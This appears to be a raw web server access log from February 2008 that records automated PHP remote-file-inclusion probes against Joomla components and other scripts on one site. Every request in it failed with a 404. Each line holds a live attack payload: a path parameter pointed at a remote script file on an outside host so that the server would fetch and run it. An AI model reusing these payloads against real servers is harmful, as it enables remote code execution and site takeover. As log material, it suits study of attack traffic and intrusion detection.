209.126.254.38 - - [24/Feb/2008:07:31:33 -0800] "GET /logs//appserv/main.php?appserv_root=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
209.126.254.38 - - [24/Feb/2008:07:31:33 -0800] "GET //appserv/main.php?appserv_root=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
61.218.51.165 - - [24/Feb/2008:07:31:55 -0800] "GET /logs/access_080211.log//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
61.218.51.165 - - [24/Feb/2008:07:31:56 -0800] "GET //components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
61.218.51.165 - - [24/Feb/2008:07:31:57 -0800] "GET /logs//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
201.35.66.58 - - [24/Feb/2008:07:32:14 -0800] "GET /logs/access_080114.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [24/Feb/2008:07:32:17 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [24/Feb/2008:07:32:20 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.234.116.170 - - [24/Feb/2008:07:33:51 -0800] "GET /index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
211.234.116.170 - - [24/Feb/2008:07:33:51 -0800] "GET /logs/index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
70.84.141.194 - - [24/Feb/2008:07:35:19 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.84.141.194 - - [24/Feb/2008:07:35:24 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.84.141.194 - - [24/Feb/2008:07:35:31 -0800] "GET /logs/access.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.100.219.165 - - [24/Feb/2008:07:35:34 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:07:37:19 -0800] "GET /logs/access_071224.log/index.php?product=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:07:37:19 -0800] "GET /logs/index.php?product=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:07:41:43 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:07:41:43 -0800] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:07:41:44 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:07:42:44 -0800] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:07:42:45 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulous